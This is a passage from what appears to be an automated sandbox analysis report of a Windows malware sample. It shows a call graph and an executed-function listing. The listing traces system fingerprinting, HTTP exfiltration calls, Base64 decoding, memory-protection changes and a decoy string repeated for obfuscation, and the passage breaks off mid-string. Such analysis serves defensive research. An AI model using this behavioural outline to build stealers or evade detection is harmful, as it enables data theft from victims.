4045c0 34 API calls 27154->27155 27156 404270 27155->27156 27157 4045c0 34 API calls 27156->27157 27158 404289 27157->27158 27159 4045c0 34 API calls 27158->27159 27160 4042a2 27159->27160 27161 4045c0 34 API calls 27160->27161 27162 4042bb 27161->27162 27163 4045c0 34 API calls 27162->27163 27164 4042d4 27163->27164 27165 4045c0 34 API calls 27164->27165 27166 4042ed 27165->27166 27167 4045c0 34 API calls 27166->27167 27168 404306 27167->27168 27169 4045c0 34 API calls 27168->27169 27170 40431f 27169->27170 27171 4045c0 34 API calls 27170->27171 27172 404338 27171->27172 27173 4045c0 34 API calls 27172->27173 27174 404351 27173->27174 27175 4045c0 34 API calls 27174->27175 27176 40436a 27175->27176 27177 4045c0 34 API calls 27176->27177 27178 404383 27177->27178 27179 4045c0 34 API calls 27178->27179 27180 40439c 27179->27180 27181 4045c0 34 API calls 27180->27181 27182 4043b5 27181->27182 27183 4045c0 34 API calls 27182->27183 27184 4043ce 27183->27184 27185 4045c0 34 API calls 27184->27185 27186 4043e7 27185->27186 27187 4045c0 34 API calls 27186->27187 27188 404400 27187->27188 27189 4045c0 34 API calls 27188->27189 27190 404419 27189->27190 27191 4045c0 34 API calls 27190->27191 27192 404432 27191->27192 27193 4045c0 34 API calls 27192->27193 27194 40444b 27193->27194 27195 4045c0 34 API calls 27194->27195 27196 404464 27195->27196 27197 4045c0 34 API calls 27196->27197 27198 40447d 27197->27198 27199 4045c0 34 API calls 27198->27199 27200 404496 27199->27200 27201 4045c0 34 API calls 27200->27201 27202 4044af 27201->27202 27203 4045c0 34 API calls 27202->27203 27204 4044c8 27203->27204 27205 4045c0 34 API calls 27204->27205 27206 4044e1 27205->27206 27207 4045c0 34 API calls 27206->27207 27208 4044fa 27207->27208 27209 4045c0 34 API calls 27208->27209 27210 404513 27209->27210 27211 4045c0 34 API calls 27210->27211 27212 40452c 27211->27212 27213 4045c0 34 API calls 27212->27213 27214 404545 27213->27214 27215 4045c0 34 API calls 27214->27215 27216 40455e 27215->27216 27217 4045c0 34 API calls 27216->27217 27218 404577 27217->27218 27219 4045c0 34 API calls 27218->27219 27220 404590 27219->27220 27221 4045c0 34 API calls 27220->27221 27222 4045a9 27221->27222 27223 419c10 27222->27223 27224 419c20 43 API calls 27223->27224 27225 41a036 8 API calls 27223->27225 27224->27225 27226 41a146 27225->27226 27227 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27225->27227 27228 41a153 8 API calls 27226->27228 27229 41a216 27226->27229 27227->27226 27228->27229 27230 41a298 27229->27230 27231 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27229->27231 27232 41a2a5 6 API calls 27230->27232 27233 41a337 27230->27233 27231->27230 27232->27233 27234 41a344 9 API calls 27233->27234 27235 41a41f 27233->27235 27234->27235 27236 41a4a2 27235->27236 27237 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27235->27237 27238 41a4ab GetProcAddress GetProcAddress 27236->27238 27239 41a4dc 27236->27239 27237->27236 27238->27239 27240 41a515 27239->27240 27241 41a4e5 GetProcAddress GetProcAddress 27239->27241 27242 41a612 27240->27242 27243 41a522 10 API calls 27240->27243 27241->27240 27244 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27242->27244 27245 41a67d 27242->27245 27243->27242 27244->27245 27246 41a686 GetProcAddress 27245->27246 27247 41a69e 27245->27247 27246->27247 27248 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27247->27248 27249 415ca3 27247->27249 27248->27249 27250 401590 27249->27250 27525 401670 27250->27525 27253 41a7a0 lstrcpy 27254 4015b5 27253->27254 27255 41a7a0 lstrcpy 27254->27255 27256 4015c7 27255->27256 27257 41a7a0 lstrcpy 27256->27257 27258 4015d9 27257->27258 27259 41a7a0 lstrcpy 27258->27259 27260 401663 27259->27260 27261 415510 27260->27261 27262 415521 27261->27262 27263 41a820 2 API calls 27262->27263 27264 41552e 27263->27264 27265 41a820 2 API calls 27264->27265 27266 41553b 27265->27266 27267 41a820 2 API calls 27266->27267 27268 415548 27267->27268 27269 41a740 lstrcpy 27268->27269 27270 415555 27269->27270 27271 41a740 lstrcpy 27270->27271 27272 415562 27271->27272 27273 41a740 lstrcpy 27272->27273 27274 41556f 27273->27274 27275 41a740 lstrcpy 27274->27275 27315 41557c 27275->27315 27276 41a820 lstrlenA lstrcpy 27276->27315 27277 41a740 lstrcpy 27277->27315 27278 41a8a0 lstrcpy 27278->27315 27279 415643 StrCmpCA 27279->27315 27280 4156a0 StrCmpCA 27281 4157dc 27280->27281 27280->27315 27283 41a8a0 lstrcpy 27281->27283 27282 41a7a0 lstrcpy 27282->27315 27284 4157e8 27283->27284 27285 41a820 2 API calls 27284->27285 27286 4157f6 27285->27286 27288 41a820 2 API calls 27286->27288 27287 415856 StrCmpCA 27289 415991 27287->27289 27287->27315 27291 415805 27288->27291 27290 41a8a0 lstrcpy 27289->27290 27293 41599d 27290->27293 27294 401670 lstrcpy 27291->27294 27292 401590 lstrcpy 27292->27315 27295 41a820 2 API calls 27293->27295 27313 415811 27294->27313 27297 4159ab 27295->27297 27296 4151f0 23 API calls 27296->27315 27300 41a820 2 API calls 27297->27300 27298 415a0b StrCmpCA 27301 415a16 Sleep 27298->27301 27302 415a28 27298->27302 27299 4152c0 29 API calls 27299->27315 27303 4159ba 27300->27303 27301->27315 27304 41a8a0 lstrcpy 27302->27304 27305 401670 lstrcpy 27303->27305 27306 415a34 27304->27306 27305->27313 27307 41a820 2 API calls 27306->27307 27308 415a43 27307->27308 27309 41a820 2 API calls 27308->27309 27310 415a52 27309->27310 27312 401670 lstrcpy 27310->27312 27311 41578a StrCmpCA 27311->27315 27312->27313 27313->26369 27314 41593f StrCmpCA 27314->27315 27315->27276 27315->27277 27315->27278 27315->27279 27315->27280 27315->27282 27315->27287 27315->27292 27315->27296 27315->27298 27315->27299 27315->27311 27315->27314 27317 417553 GetVolumeInformationA 27316->27317 27318 41754c 27316->27318 27319 417591 27317->27319 27318->27317 27320 4175fc GetProcessHeap HeapAlloc 27319->27320 27321 417619 27320->27321 27322 417628 wsprintfA 27320->27322 27323 41a740 lstrcpy 27321->27323 27324 41a740 lstrcpy 27322->27324 27325 415da7 27323->27325 27324->27325 27325->26390 27327 41a7a0 lstrcpy 27326->27327 27328 404899 27327->27328 27534 4047b0 27328->27534 27330 4048a5 27331 41a740 lstrcpy 27330->27331 27332 4048d7 27331->27332 27333 41a740 lstrcpy 27332->27333 27334 4048e4 27333->27334 27335 41a740 lstrcpy 27334->27335 27336 4048f1 27335->27336 27337 41a740 lstrcpy 27336->27337 27338 4048fe 27337->27338 27339 41a740 lstrcpy 27338->27339 27340 40490b InternetOpenA StrCmpCA 27339->27340 27341 404944 27340->27341 27342 404955 27341->27342 27343 404ecb InternetCloseHandle 27341->27343 27547 418b60 GetSystemTime lstrcpy lstrcpy 27342->27547 27344 404ee8 27343->27344 27542 409ac0 CryptStringToBinaryA 27344->27542 27346 404963 27548 41a920 lstrcpy lstrcpy lstrcatA 27346->27548 27349 404976 27351 41a8a0 lstrcpy 27349->27351 27356 40497f 27351->27356 27352 41a820 2 API calls 27353 404f05 27352->27353 27354 41a9b0 4 API calls 27353->27354 27357 404f1b 27354->27357 27355 404f27 ctype 27358 41a7a0 lstrcpy 27355->27358 27360 41a9b0 4 API calls 27356->27360 27359 41a8a0 lstrcpy 27357->27359 27371 404f57 27358->27371 27359->27355 27361 4049a9 27360->27361 27362 41a8a0 lstrcpy 27361->27362 27363 4049b2 27362->27363 27364 41a9b0 4 API calls 27363->27364 27365 4049d1 27364->27365 27366 41a8a0 lstrcpy 27365->27366 27367 4049da 27366->27367 27549 41a920 lstrcpy lstrcpy lstrcatA 27367->27549 27369 4049f8 27370 41a8a0 lstrcpy 27369->27370 27372 404a01 27370->27372 27371->26393 27373 41a9b0 4 API calls 27372->27373 27374 404a20 27373->27374 27375 41a8a0 lstrcpy 27374->27375 27376 404a29 27375->27376 27377 41a9b0 4 API calls 27376->27377 27378 404a48 27377->27378 27379 41a8a0 lstrcpy 27378->27379 27380 404a51 27379->27380 27381 41a9b0 4 API calls 27380->27381 27382 404a7d 27381->27382 27550 41a920 lstrcpy lstrcpy lstrcatA 27382->27550 27384 404a84 27385 41a8a0 lstrcpy 27384->27385 27386 404a8d 27385->27386 27387 404aa3 InternetConnectA 27386->27387 27387->27343 27388 404ad3 HttpOpenRequestA 27387->27388 27390 404b28 27388->27390 27391 404ebe InternetCloseHandle 27388->27391 27392 41a9b0 4 API calls 27390->27392 27391->27343 27393 404b3c 27392->27393 27394 41a8a0 lstrcpy 27393->27394 27395 404b45 27394->27395 27551 41a920 lstrcpy lstrcpy lstrcatA 27395->27551 27397 404b63 27398 41a8a0 lstrcpy 27397->27398 27399 404b6c 27398->27399 27400 41a9b0 4 API calls 27399->27400 27401 404b8b 27400->27401 27402 41a8a0 lstrcpy 27401->27402 27403 404b94 27402->27403 27404 41a9b0 4 API calls 27403->27404 27405 404bb5 27404->27405 27406 41a8a0 lstrcpy 27405->27406 27407 404bbe 27406->27407 27408 41a9b0 4 API calls 27407->27408 27409 404bde 27408->27409 27410 41a8a0 lstrcpy 27409->27410 27411 404be7 27410->27411 27412 41a9b0 4 API calls 27411->27412 27413 404c06 27412->27413 27414 41a8a0 lstrcpy 27413->27414 27415 404c0f 27414->27415 27552 41a920 lstrcpy lstrcpy lstrcatA 27415->27552 27417 404c2d 27418 41a8a0 lstrcpy 27417->27418 27419 404c36 27418->27419 27420 41a9b0 4 API calls 27419->27420 27421 404c55 27420->27421 27422 41a8a0 lstrcpy 27421->27422 27423 404c5e 27422->27423 27424 41a9b0 4 API calls 27423->27424 27425 404c7d 27424->27425 27426 41a8a0 lstrcpy 27425->27426 27427 404c86 27426->27427 27553 41a920 lstrcpy lstrcpy lstrcatA 27427->27553 27429 404ca4 27430 41a8a0 lstrcpy 27429->27430 27431 404cad 27430->27431 27432 41a9b0 4 API calls 27431->27432 27433 404ccc 27432->27433 27434 41a8a0 lstrcpy 27433->27434 27435 404cd5 27434->27435 27436 41a9b0 4 API calls 27435->27436 27437 404cf6 27436->27437 27438 41a8a0 lstrcpy 27437->27438 27439 404cff 27438->27439 27440 41a9b0 4 API calls 27439->27440 27441 404d1f 27440->27441 27442 41a8a0 lstrcpy 27441->27442 27443 404d28 27442->27443 27444 41a9b0 4 API calls 27443->27444 27445 404d47 27444->27445 27446 41a8a0 lstrcpy 27445->27446 27447 404d50 27446->27447 27554 41a920 lstrcpy lstrcpy lstrcatA 27447->27554 27449 404d6e 27450 41a8a0 lstrcpy 27449->27450 27451 404d77 27450->27451 27452 41a740 lstrcpy 27451->27452 27453 404d92 27452->27453 27555 41a920 lstrcpy lstrcpy lstrcatA 27453->27555 27455 404db3 27556 41a920 lstrcpy lstrcpy lstrcatA 27455->27556 27457 404dba 27458 41a8a0 lstrcpy 27457->27458 27459 404dc6 27458->27459 27460 404de7 lstrlenA 27459->27460 27461 404dfa 27460->27461 27462 404e03 lstrlenA 27461->27462 27557 41aad0 27462->27557 27464 404e13 HttpSendRequestA 27465 404e32 InternetReadFile 27464->27465 27466 404e67 InternetCloseHandle 27465->27466 27471 404e5e 27465->27471 27469 41a800 27466->27469 27468 41a9b0 4 API calls 27468->27471 27469->27391 27470 41a8a0 lstrcpy 27470->27471 27471->27465 27471->27466 27471->27468 27471->27470 27562 41aad0 27472->27562 27474 4117c4 StrCmpCA 27475 4117d7 27474->27475 27476 4117cf ExitProcess 27474->27476 27477 4117e7 strtok_s 27475->27477 27489 4117f4 27477->27489 27478 4119c2 27478->26395 27479 41199e strtok_s 27479->27489 27480 4118ad StrCmpCA 27480->27489 27481 4118cf StrCmpCA 27481->27489 27482 4118f1 StrCmpCA 27482->27489 27483 411951 StrCmpCA 27483->27489 27484 411970 StrCmpCA 27484->27489 27485 411913 StrCmpCA 27485->27489 27486 411932 StrCmpCA 27486->27489 27487 41185d StrCmpCA 27487->27489 27488 41187f StrCmpCA 27488->27489 27489->27478 27489->27479 27489->27480 27489->27481 27489->27482 27489->27483 27489->27484 27489->27485 27489->27486 27489->27487 27489->27488 27490 41a820 lstrlenA lstrcpy 27489->27490 27491 41a820 2 API calls 27489->27491 27490->27489 27491->27479 27492->26401 27493->26403 27494->26409 27495->26411 27496->26417 27497->26419 27498->26423 27499->26427 27500->26431 27501->26437 27502->26439 27503->26443 27504->26457 27505->26461 27506->26460 27507->26456 27508->26460 27509->26478 27510->26463 27511->26465 27512->26469 27513->26474 27514->26475 27515->26501 27516->26502 27517->26506 27518->26513 27519->26518 27520->26517 27521->26514 27522->26517 27523->26527 27526 41a7a0 lstrcpy 27525->27526 27527 401683 27526->27527 27528 41a7a0 lstrcpy 27527->27528 27529 401695 27528->27529 27530 41a7a0 lstrcpy 27529->27530 27531 4016a7 27530->27531 27532 41a7a0 lstrcpy 27531->27532 27533 4015a3 27532->27533 27533->27253 27558 401030 27534->27558 27538 404838 lstrlenA 27561 41aad0 27538->27561 27540 404848 InternetCrackUrlA 27541 404867 27540->27541 27541->27330 27543 409af9 LocalAlloc 27542->27543 27544 404eee 27542->27544 27543->27544 27545 409b14 CryptStringToBinaryA 27543->27545 27544->27352 27544->27355 27545->27544 27546 409b39 LocalFree 27545->27546 27546->27544 27547->27346 27548->27349 27549->27369 27550->27384 27551->27397 27552->27417 27553->27429 27554->27449 27555->27455 27556->27457 27557->27464 27559 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27558->27559 27560 41aad0 27559->27560 27560->27538 27561->27540 27562->27474 27693 416ab1 902 API calls 27652 4069f3 7 API calls 27724 2d1fd67 152 API calls 27696 41cafe 219 API calls 5 library calls 27634 2d215b3 18 API calls ctype 27655 2d212eb strtok_s lstrlen lstrcpy 26134 401190 26141 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26134->26141 26136 40119e 26137 4011cc 26136->26137 26143 417850 GetProcessHeap HeapAlloc GetUserNameA 26136->26143 26139 4011b7 26139->26137 26140 4011c4 ExitProcess 26139->26140 26142 417939 26141->26142 26142->26136 26144 4178c3 26143->26144 26144->26139 27563 2d10005 27568 2d1092b GetPEB 27563->27568 27565 2d10030 27569 2d1003c 27565->27569 27568->27565 27570 2d10049 27569->27570 27584 2d10e0f SetErrorMode SetErrorMode 27570->27584 27575 2d10265 27576 2d102ce VirtualProtect 27575->27576 27577 2d1030b 27576->27577 27578 2d10439 VirtualFree 27577->27578 27582 2d105f4 LoadLibraryA 27578->27582 27583 2d104be 27578->27583 27579 2d104e3 LoadLibraryA 27579->27583 27581 2d108c7 27582->27581 27583->27579 27583->27582 27585 2d10223 27584->27585 27586 2d10d90 27585->27586 27587 2d10dad 27586->27587 27588 2d10dbb GetPEB 27587->27588 27589 2d10238 VirtualAlloc 27587->27589 27588->27589 27589->27575 27728 2d2d106 41 API calls __amsg_exit 27637 2d26a0a ExitProcess 27590 2e09a3e 27591 2e09a4d 27590->27591 27594 2e0a1de 27591->27594 27595 2e0a1f9 27594->27595 27596 2e0a202 CreateToolhelp32Snapshot 27595->27596 27597 2e0a21e Module32First 27595->27597 27596->27595 27596->27597 27598 2e09a56 27597->27598 27599 2e0a22d 27597->27599 27601 2e09e9d 27599->27601 27602 2e09ec8 27601->27602 27603 2e09f11 27602->27603 27604 2e09ed9 VirtualAlloc 27602->27604 27603->27603 27604->27603 27698 41ce9f 69 API calls __amsg_exit 27639 4088a4 RaiseException task __CxxThrowException@8 27640 4180a5 GetProcessHeap HeapFree 27659 2d19b37 7 API calls 27700 2d21c35 110 API calls 27660 41b9b0 RtlUnwind 27661 2d1932a ??2@YAPAXI RaiseException allocator

                                                                                    Executed Functions

                                                                                    Function 004045C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114stringmemoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                                                                    • strlen.MSVCRT ref: 004046F0
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                                                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                                                                    Strings
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist 